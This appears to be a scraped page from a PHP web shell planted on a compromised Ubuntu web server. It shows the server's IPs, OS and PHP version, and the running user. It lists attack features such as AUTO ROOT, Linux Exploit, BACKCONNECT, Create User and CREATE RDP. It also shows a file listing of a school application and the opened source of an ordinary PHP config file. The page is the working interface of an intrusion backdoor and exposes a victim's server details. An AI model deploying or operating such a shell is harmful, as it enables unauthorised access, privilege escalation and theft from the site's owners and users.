Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.23.92.50
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
parikshamitra /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
phpmailer
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
19.28
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
19.26
KB
-rwxr-xr-x
cManualMailer.php
1.52
KB
-rwxr-xr-x
caccesscontext.php
1.24
KB
-rwxr-xr-x
cappcontext.php
3.29
KB
-rwxr-xr-x
cmailer.php
6.83
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.76
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
514
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.35
KB
-rwxr-xr-x
dropdown.php
844
B
-rwxr-xr-x
feehead.php
1.51
KB
-rwxr-xr-x
format.php
7.43
KB
-rwxr-xr-x
getdata.php
1.06
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
home.html
14.48
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
login.php
1.64
KB
-rwxr-xr-x
mregistry.php
2.29
KB
-rwxr-xr-x
mregistry_11122017.php
2.03
KB
-rwxr-xr-x
reportapplicationform.php
26.32
KB
-rwxr-xr-x
reportapplicationform27092017....
22.58
KB
-rwxr-xr-x
reportapplicationform_20092017...
22.12
KB
-rwxr-xr-x
reportapplicationform_22092017...
22.22
KB
-rwxr-xr-x
reportapplicationform_23082018...
25.62
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
servfee.php
1.38
KB
-rwxr-xr-x
servicedet.php
1.6
KB
-rwxr-xr-x
stringspliter.php
693
B
-rwxr-xr-x
student.php
35.65
KB
-rwxr-xr-x
student_06102017.php
23.34
KB
-rwxr-xr-x
student_10072018.php
26.67
KB
-rwxr-xr-x
student_11122017.php
24.47
KB
-rwxr-xr-x
student_20092017.php
21.88
KB
-rwxr-xr-x
student_22012018.php
26.59
KB
-rwxr-xr-x
student_22092017.php
21.97
KB
-rwxr-xr-x
student_28092017.php
23.14
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cappcontext.php
<?php require_once("cconfig.php"); require_once( APP_DB_G . "/adodb.inc.php"); require_once( APP_DB_G . "/tohtml.inc.php"); require_once( APP_DB_G . "/toexport.inc.php"); require_once( APP_SRC_G . "/crequestbroker.php"); require_once( APP_SRC_G . "/csessions.php"); require_once( APP_SRC_G . "/coutput.php"); require_once( APP_SRC_G . "/cuser.php"); class CApplicationContext { public $mobj_config; #Config Object public $mobj_db; #Adodb Object public $mobj_orb; #Request Broker - Singleton Class with static functions public $mobj_user; #User Object public $mobj_data; #Data public $mobj_output; #Output stream public $main_src; #public $mobj_logger; #Logger stream function __construct() { } function Initialize() { # all the contained object creations happen here and not in the constructor # this is to avoid exceptions during object creation # 06. Input - Init $this->mobj_data = $_REQUEST; //var_dump($_REQUEST); # 01. Create the Config Object //$this->mobj_config = new CConfig( isset($this->mobj_data["dbg"]) ); $this->mobj_config = new CConfig( isset($this->mobj_data["dbg"]), $this->mobj_data["cdb"]); # 02. Create the DB Object $this->mobj_db = ADONewConnection("mysqli"); # by default we connect to mysql $this->mobj_db->debug = $this->mobj_config->mbool_debug; $lbool_res = $this->mobj_db->Connect($this->mobj_config->mstr_host, $this->mobj_config->mstr_user, $this->mobj_config->mstr_password, $this->mobj_config->mstr_db); # 03. Create the Request Broker $this->mobj_orb = CRequestBroker::GetInstance(); /* Actions to be registered in mregistry.php */ # 04. Sessions CSessions::Initialize(); # 07. Output - Init $this->mobj_output = new COutput(); $this->mobj_output->Initialize(); # 05. User $this->mobj_user = CSessions::GetUser(); $this->mobj_user = CSessions::GetUser(); //$sess_obj=NEW CSessions(); // $this->mobj_user = $sess_obj->GetUserManual(); if (!isset($this->mobj_user)) $this->mobj_user = new CUser($this); # to get the main source $script_name=($_SERVER['SCRIPT_NAME']); $removed_slash=substr($script_name,1,strlen($script_name)); $main_folder_name= substr($removed_slash,0,$pos); $removed_slash=substr($script_name,1,strlen($script_name)); $pos=strpos($removed_slash, "app.php"); //$main_folder_name=strstr(substr($script_name,1,strlen($script_name)),"/",true); $main_folder_name= substr($removed_slash,0,$pos); $dir="{$_SERVER['DOCUMENT_ROOT']}/{$main_folder_name}"; $this->main_src=$dir; //$this->main_src=$_SERVER["DOCUMENT_ROOT"]."/".$main_src_obj[1]; $main_src_obj=(explode("/",$_SERVER["REQUEST_URI"])); if(count($main_src_obj)==3) $root= $main_src_obj[1]; else $root=""; $this->main_path="http://".$_SERVER["SERVER_NAME"].'/'.$root; } function __destruct() { # though php closes the db, it is good practice to do it ourselves explicitely once # $this->mobj_db->Close(); unset($this->mobj_db); unset($this->mobj_config); } } ?>
Close